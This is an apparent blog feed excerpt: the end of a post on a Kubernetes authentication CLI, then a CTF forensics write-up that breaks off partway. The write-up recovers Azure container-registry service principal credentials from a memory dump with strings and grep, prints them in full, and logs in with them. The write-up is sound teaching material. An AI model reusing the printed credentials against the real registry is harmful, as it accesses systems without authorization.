&lt;p&gt;You can update the permission using the  &lt;code&gt;k8s-auth update permisssion&lt;/code&gt;  command! This command can update groups and users permission&lt;/p&gt;
&lt;p&gt;In case you change the permission for a user that belgons to a group. This user will leave that group because he will have his own permissions (different from the group one)&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can’t delete a group if is not empty!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;When User have an opened session with a cluster and use kubectl normally and you decide to delete that user the session will be closed and he can’t do anything!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&#34;authenticate-to-a-cluster&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#authenticate-to-a-cluster&#34;&gt;#&lt;/a&gt; Authenticate to a cluster&lt;/h2&gt;
&lt;p&gt;As a regular user you need to login to the authentication server using  &lt;code&gt;k8s-auth login&lt;/code&gt;  and you’ll receive a link as the admin login process!&lt;/p&gt;
&lt;p&gt;Then you can list the clusters that you can authenticate with using  &lt;code&gt;k8s-auth get clusters&lt;/code&gt;  and keep in your mind that you’ll never see the token of each cluster (Only admins can see tokens)&lt;/p&gt;
&lt;p&gt;Once you decided which cluster you’ll authenticate! run the command  &lt;code&gt;k8s-auth auth&lt;/code&gt;  with specifying the cluster name!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;authenticate&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;k8s-auth auth cluster=ctf-cluster&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;To use this cluster run this &lt;span class=&#34;built_in&#34;&gt;command&lt;/span&gt;: &lt;span class=&#34;built_in&#34;&gt;export&lt;/span&gt; KUBECONFIG=&lt;span class=&#34;variable&#34;&gt;$HOME&lt;/span&gt;/.k8s-auth.config&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;If you’re authorized, you’ll receive a message like that! What is happening?&lt;/p&gt;
&lt;p&gt;Actually the k8s-auth CLI generate a kubeconfig file for you! run the command that the CLI suggest to you! BOOOM Start Kubectlying !!! xD&lt;/p&gt;
&lt;h2 id=&#34;conclusion&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#conclusion&#34;&gt;#&lt;/a&gt; Conclusion&lt;/h2&gt;
&lt;p&gt;As highlighted in the blog post, the process of authentication has been simplified with just 3 simple commands - login, auth, and export KUBECONFIG. These commands enable users to easily open a session with any cluster they want, regardless of the number of clusters and different permissions required, using just a single set of credentials. Additionally, the administrator can easily set up agents in the clusters, and manage the permissions and the entire process centrally using a smooth command line interface.&lt;/p&gt;
</content>
        <updated>2023-04-28T10:29:37.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2023/03/23/Writeups/ncsc2023/</id>
        <title>NCSC&#39;2023 Writeup Challenges</title>
        <link rel="alternate" href="http://example.com/2023/03/23/Writeups/ncsc2023/"/>
        <content type="html">&lt;p&gt;The National Cyber Security Congress (NCSC) is a three-day event that brings together cyber security enthusiasts and experts. The event features a wide range of activities, including workshops, talks, conferences, and two exciting CTF competitions.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/LJslRYb.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;As a technical team member, I had the chance to create challenges in Kubernetes, Digital Forensics, Misc, Hardware, and Game Hacking categories.&lt;/p&gt;
&lt;p&gt;The NCSC CTF provided a unique opportunity for cyber security enthusiasts to demonstrate their problem-solving abilities, teamwork, and technical proficiency in a fun and competitive environment. Overall, the event was an exciting and rewarding experience for all involved.&lt;/p&gt;
&lt;p&gt;In this blog, I will share some write-ups that players have requested!&lt;/p&gt;
&lt;h1 id=&#34;digital-forensics-mokni-seals&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#digital-forensics-mokni-seals&#34;&gt;#&lt;/a&gt; Digital Forensics : Mokni &amp;amp; Seals&lt;/h1&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/i231apB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We got a zip file! I bet that file is a memory dump! So i tried to run the volatility imageinfo plugin but it takes a long time. So I tried to figure out if this file is Linux memory dump or not!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;linux or win ?&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s: strings data.raw | grep &lt;span class=&#34;string&#34;&gt;&amp;quot;Linux version&amp;quot;&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Linux version 5.8.0-43-generic (buildd@lcy01-amd64-018) (gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0, GNU ld (GNU Binutils &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; Ubuntu) 2.34) 49~20.04.1-Ubuntu SMP Fri Feb 5 09:57:56 UTC 2021 (Ubuntu 5.8.0-43.49~20.04.1-generic 5.8.18)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And yes it’s a Linux Memory dump! I guess its time to start finding/making a profile but let me check that is memory dump can be analyzed with a profile or not!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;checking&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;strings data.raw | grep -i insmod       &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;sudo insmod ./lime-5.8.0-43-generic.ko path=../../Linux64.mem format=raw&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;sudo insmod ./lime-5.8.0-43-generic.ko &lt;span class=&#34;string&#34;&gt;&amp;quot;path=../../Linux64.mem format=raw&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;sudo insmod ./lime-5.8.0-43-generic.ko &lt;span class=&#34;string&#34;&gt;&amp;quot;path=../../Linux64.mem format=raw&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Oh! The format is ram! which means that even if we get the correct profile volatility can’t analyze this memory dump! Strings time! The author want us to solve this mem dump using strings !&lt;/p&gt;
&lt;p&gt;Let’s try to figure out some command lines! Bash history! Let me show you this trick!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;extract bash history&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;strings data.raw | grep -Ei &lt;span class=&#34;string&#34;&gt;&amp;quot;@*:~\\$&amp;quot;&lt;/span&gt;     &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ vim /etc/containers/registries.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;This Is My Secret&amp;quot;&lt;/span&gt; &amp;gt; secret.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ podman login -u $(&lt;span class=&#34;built_in&#34;&gt;head&lt;/span&gt; -n 2 secret.txt | &lt;span class=&#34;built_in&#34;&gt;tail&lt;/span&gt; -n 1 | awk &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#123; print $4 &amp;#125;&amp;#x27;&lt;/span&gt;) -p $(&lt;span class=&#34;built_in&#34;&gt;head&lt;/span&gt; -n 3 secret.txt | &lt;span class=&#34;built_in&#34;&gt;tail&lt;/span&gt; -n 1 | awk &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#123; print $4 &amp;#125;&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ podman pull nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;^Craf-square@ubuntu:~$ &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; LiME/src/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ vim /etc/containers/registries.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ vim /etc/containers/registries.conf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;u:~$ podman login -u $(&lt;span class=&#34;built_in&#34;&gt;head&lt;/span&gt; -n 2 secret.txt | &lt;span class=&#34;built_in&#34;&gt;tail&lt;/span&gt; -n 1 | awk &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#123; print $4 &amp;#125;&amp;#x27;&lt;/span&gt;) -p $(&lt;span class=&#34;built_in&#34;&gt;head&lt;/span&gt; -n 3 secret.txt | &lt;span class=&#34;built_in&#34;&gt;tail&lt;/span&gt; -n 1 | awk &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;#123; print $4 &amp;#125;&amp;#x27;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Mmmm nice! now at least we got some commands and we got the user-name and host-name !&lt;br&gt;
From these commands we can understand that the user edit  &lt;code&gt;/etc/containers/registries.conf&lt;/code&gt; , then create a  &lt;code&gt;secret.txt&lt;/code&gt; . Then logged in with podman using that secret.txt. But we don’t have any information about the content of the creds in these commands!.&lt;/p&gt;
&lt;p&gt;We have 2 methods to figure out what’s happen and get the creds!&lt;/p&gt;
&lt;p&gt;either running a strings and grepping on  &lt;code&gt;CMDLINE=podman login&lt;/code&gt;  or grepping on  &lt;code&gt;This Is My Secret&lt;/code&gt;  and check the lines before and after to see the content!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;extract creds&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;strings data.raw | grep -Ei &lt;span class=&#34;string&#34;&gt;&amp;quot;CMDLINE=podman login&amp;quot;&lt;/span&gt;       &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;_CMDLINE=podman login -u 2ecf92b1-83a8-4355-8cb7-8354f4677894 -p fwO8Q~XTlBmpYoG43J~OusANA_azV02ZS3PuzaXb&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;OR&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;extract creds&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;strings data.raw | grep -Ei -C 2 &lt;span class=&#34;string&#34;&gt;&amp;quot;This Is My Secret&amp;quot;&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Documents  LiME         Music     Public      Templates&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Desktop  Downloads  Linux64.mem  Pictures  secret.txt  Videos&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;This Is My Secret&amp;quot;&lt;/span&gt; &amp;gt; secret.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf-square@ubuntu:~$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;fctt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;application/octet-stream&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;text/plain&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;This Is My Secret&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Service principal ID: 2ecf92b1-83a8-4355-8cb7-8354f4677894&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Service principal password: fwO8Q~XTlBmpYoG43J~OusANA_azV02ZS3PuzaXb&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;So the creds are  &lt;code&gt;2ecf92b1-83a8-4355-8cb7-8354f4677894:fwO8Q~XTlBmpYoG43J~OusANA_azV02ZS3PuzaXb&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;But I didn’t think this is a normal creds for  &lt;code&gt;dockerhub&lt;/code&gt;  or any public famous container registry! Espacially he pulled a container named nginx! I bet that nginx is a customized one and its a trick!&lt;/p&gt;
&lt;p&gt;Editing  &lt;code&gt;/etc/containers/registries.conf&lt;/code&gt;  can confirm that change something! This configuration file used by the container runtime environment on Linux systems. This file specifies a list of container image registries that are trusted by the system and can be used to download container images.&lt;/p&gt;
&lt;p&gt;So let’s discover how to get the registry! Pulling nginx means he pulled the latest tag or at least he tried that! So let’s grep on  &lt;code&gt;nginx:latest&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;extract registry&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;strings data.raw | grep -Ei &lt;span class=&#34;string&#34;&gt;&amp;quot;nginx:latest&amp;quot;&lt;/span&gt;  &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Trying to pull qualsk8s.azurecr.io/nginx:latest...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Trying to pull qualsk8s.azurecr.io/nginx:latest...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;quot;, &amp;quot;&lt;/span&gt;qualsk8s.azurecr.io/nginx:latest&lt;span class=&#34;string&#34;&gt;&amp;quot;) not found&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;Trying to pull qualsk8s.azurecr.io/nginx:latest...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;Trying to pull qualsk8s.azurecr.io/nginx:latest...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;Trying to pull qualsk8s.azurecr.io/nginx:latest...&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo!  &lt;code&gt;qualsk8s.azurecr.io&lt;/code&gt;  is the container registry! If you are an Azure guy you can get that from the previous step! when we get this output!&lt;/p&gt;
&lt;figure class=&#34;highlight text&#34;&gt;&lt;figcaption&gt;&lt;span&gt;creds&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Service principal ID: 2ecf92b1-83a8-4355-8cb7-8354f4677894&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Service principal password: fwO8Q~XTlBmpYoG43J~OusANA_azV02ZS3PuzaXb&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ok it’s time to login and pull that image and run it!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;login and pull&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;docker login qualsk8s.azurecr.io -u 2ecf92b1-83a8-4355-8cb7-8354f4677894 -p fwO8Q~XTlBmpYoG43J~OusANA_azV02ZS3PuzaXb &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;docker pull nginx&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After checking the image! I got that it’s a static web page so let’s run it!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;run nginx&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;docker run --name chall -p 80:80 -d nginx &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After running this container we got this web-page and guess what!! There is a flag icon! Let’s check it !&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/q3GSPiL.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;This flag icon lead you to this link  &lt;code&gt;https://pastebin.com/vjFtjMga&lt;/code&gt;  which is protected pastebin&lt;br&gt;
how to get that password now! Let’s check the docker history!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;docker history&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;mohamed@RafSquare:~$ docker &lt;span class=&#34;built_in&#34;&gt;history&lt;/span&gt; qualsk8s.azurecr.io/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;IMAGE          CREATED       CREATED BY                                      SIZE      COMMENT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;093f65335d3a   13 days ago   ENTRYPOINT [&lt;span class=&#34;string&#34;&gt;&amp;quot;nginx&amp;quot;&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;-g&amp;quot;&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;daemon off;&amp;quot;&lt;/span&gt;]         0B        buildkit.dockerfile.v0&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      13 days ago   RUN /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;chmod&lt;/span&gt; +r -R . &lt;span class=&#34;comment&#34;&gt;# buildkit         563kB     buildkit.dockerfile.v0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      13 days ago   RUN /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;mv&lt;/span&gt; password.txt .hidden.txt &lt;span class=&#34;comment&#34;&gt;#…   11B       buildkit.dockerfile.v0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      13 days ago   COPY ./ ./ &lt;span class=&#34;comment&#34;&gt;# buildkit                           563kB     buildkit.dockerfile.v0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      3 weeks ago   RUN /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; -rf ./* &lt;span class=&#34;comment&#34;&gt;# buildkit            0B        buildkit.dockerfile.v0&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      3 weeks ago   WORKDIR /usr/share/nginx/html                   0B        buildkit.dockerfile.v0&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;set&lt;/span&gt; -x     &amp;amp;&amp;amp; apkArch=&lt;span class=&#34;string&#34;&gt;&amp;quot;&lt;span class=&#34;subst&#34;&gt;$(cat /etc…   29.2MB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;subst&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c #(nop)&lt;/span&gt;  ENV NJS_VERSION=0.7.9        0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c #(nop)  CMD [&amp;quot;&lt;/span&gt;nginx&lt;span class=&#34;string&#34;&gt;&amp;quot; &amp;quot;&lt;/span&gt;-g&lt;span class=&#34;string&#34;&gt;&amp;quot; 